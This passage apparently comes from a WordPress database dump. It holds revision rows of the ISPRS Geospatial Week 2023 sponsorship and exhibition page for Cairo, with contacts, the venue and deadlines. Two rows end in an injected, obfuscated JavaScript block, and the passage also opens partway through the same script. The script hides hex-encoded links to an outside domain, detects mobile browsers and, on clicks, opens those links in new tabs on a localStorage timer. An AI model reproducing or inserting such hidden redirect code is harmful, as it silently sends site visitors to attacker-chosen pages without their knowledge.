os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2022-10-26 15:38:07','2022-10-26 15:38:07','',2920,'https://gsw2023.com/?p=2938',0,'revision','',0),
(2939,1,'2022-10-26 15:38:36','2022-10-26 15:38:36','<p>[vc_row][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><strong>ISPRS GEOSPATIAL WEEK 2023</strong></h3>\n<h3 style=\"text-align: center;\"><strong>SPONSORSHIP AND EXHIBITION - Cairo – Egypt 2-7 September 2023</strong></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</h5>\n<h5></h5>\n<h5>The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series</h5>\n<h5>of dedicated workshops. More information regarding ISPRS can be found at:</h5>\n<h5><u><a href=\"https://www.isprs.org/\">-www.isprs.org.</a></u></h5>\n<h5></h5>\n<h5>-An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</h5>\n<h5></h5>\n<h5>-A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> for more details on the sponsorship opportunities for the GSW/2023.</h5>\n<h5></h5>\n<h5>-We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</h5>\n<h5></h5>\n<h5>The GSW2023 Organizing Committee.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"chino\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4><strong>SPONSORSHIP AND EXHIBITION PACKAGES</strong></h4>\n<p><strong>Sponsorship options include the opportunity to give oral presentations about your company’s products, exhibition booths, live demonstrations and the ability to give a half-day interactive tutorial of your software or product on Sunday. More information regarding the various packages and additional à la carte options is given below. If you would like to discuss other sponsorship options or tailor-made packages, please contact the GSW Director Prof. Naser El- Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u> .</strong>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2930\" img_size=\"1600x2000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]</p>\n<h5><strong>Venue - INTERCONTINENTAL  CAIRO SEMIRAMIS</strong></h5>\n<p>(<u>https:/<a href=\"http://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc\">/www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc</a>=nav_hotel</u> <u>detail_undefined</u>)</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>The GSW2023 will take place on the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. This Cairo hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2936\" img_size=\"1000x500\" alignment=\"center\" onclick=\"zoom\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>SPONSORSHIP TIMETABLE AND DEADLINES</h5>\n<p><strong>Upon registration, the sponsor’s logo and level of support will be published on the GSW2023 website.</strong></p>\n<p>&nbsp;</p>\n<ul>\n<li><strong>March 1, 2023 Deadline for sponsorship confirmation and payment</strong></li>\n<li><strong>June 1, 2013 Delivery of sponsorship material to be included in conference bags to:</strong></li>\n</ul>\n<p>&nbsp;</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport</h5>\n<p><strong>Heliopolis Campus</strong></p>\n<p><strong>P.O. Box 2033 -Elhorria El Moshir Ismail st.-behind Sheraton Bldg. (+202) 22685616 - 22685615</strong></p>\n<p><strong>(+202) 22685892</strong></p>\n<p>&nbsp;[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2022-10-26 15:38:36','2022-10-26 15:38:36','',2920,'https://gsw2023.com/?p=2939',0,'revision','',0),
(2940,1,'2022-10-26 15:45:47','2022-10-26 15:45:47','<p>[vc_row][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><strong>ISPRS GEOSPATIAL WEEK 2023</strong></h3>\n<h3 style=\"text-align: center;\"><strong>SPONSORSHIP AND EXHIBITION - Cairo – Egypt 2-7 September 2023</strong></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</h5>\n<h5></h5>\n<h5>The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series</h5>\n<h5>of dedicated workshops. More information regarding ISPRS can be found at:</h5>\n<h5><u><a href=\"https://www.isprs.org/\">-www.isprs.org.</a></u></h5>\n<h5></h5>\n<h5>-An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</h5>\n<h5></h5>\n<h5>-A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> for more details on the sponsorship opportunities for the GSW/2023.</h5>\n<h5></h5>\n<h5>-We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</h5>\n<h5></h5>\n<h5>The GSW2023 Organizing Committee.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"chino\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h4><strong>SPONSORSHIP AND EXHIBITION PACKAGES</strong></h4>\n<p><strong>Sponsorship options include the opportunity to give oral presentations about your company’s products, exhibition booths, live demonstrations and the ability to give a half-day interactive tutorial of your software or product on Sunday. More information regarding the various packages and additional à la carte options is given below. If you would like to discuss other sponsorship options or tailor-made packages, please contact the GSW Director Prof. Naser El- Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> or <u><a href=\"mailto:info@gsw2023.com\">info@gsw2023.com</a></u> .</strong>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2930\" img_size=\"1600x2000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]</p>\n<h5><strong>Venue - INTERCONTINENTAL  CAIRO SEMIRAMIS</strong></h5>\n<p>(<u>https:/<a href=\"http://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc\">/www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc</a>=nav_hotel</u> <u>detail_undefined</u>)</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>The GSW2023 will take place on the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. This Cairo hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"2936\" img_size=\"1000x500\" alignment=\"center\" onclick=\"zoom\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>SPONSORSHIP TIMETABLE AND DEADLINES</h5>\n<p><strong>Upon registration, the sponsor’s logo and level of support will be published on the GSW2023 website.</strong></p>\n<p>&nbsp;</p>\n<ul>\n<li><strong>March 1, 2023 Deadline for sponsorship confirmation and payment</strong></li>\n<li><strong>June 1, 2013 Delivery of sponsorship material to be included in conference bags to:</strong></li>\n</ul>\n<p>&nbsp;</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport</h5>\n<p><strong>Heliopolis Campus</strong></p>\n<p><strong>P.O. Box 2033 -Elhorria El Moshir Ismail st.-behind Sheraton Bldg. (+202) 22685616 - 22685615</strong></p>\n<p><strong>(+202) 22685892</strong></p>\n<p>&nbsp;[/vc_column_text][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][ultimate_info_table design_style=\"design04\" color_scheme=\"blue\" package_heading=\"CONFERENCE PROGRAM FOR EXHIBITORS\"]</p>\n<table>\n<tbody>\n<tr>\n<td width=\"170\">\n<h5><strong>September 2</strong></h5>\n</td>\n<td width=\"189\">\n<h5><strong>9:00 – 5:00</strong></h5>\n</td>\n<td width=\"217\">\n<h5><strong>Tutorial 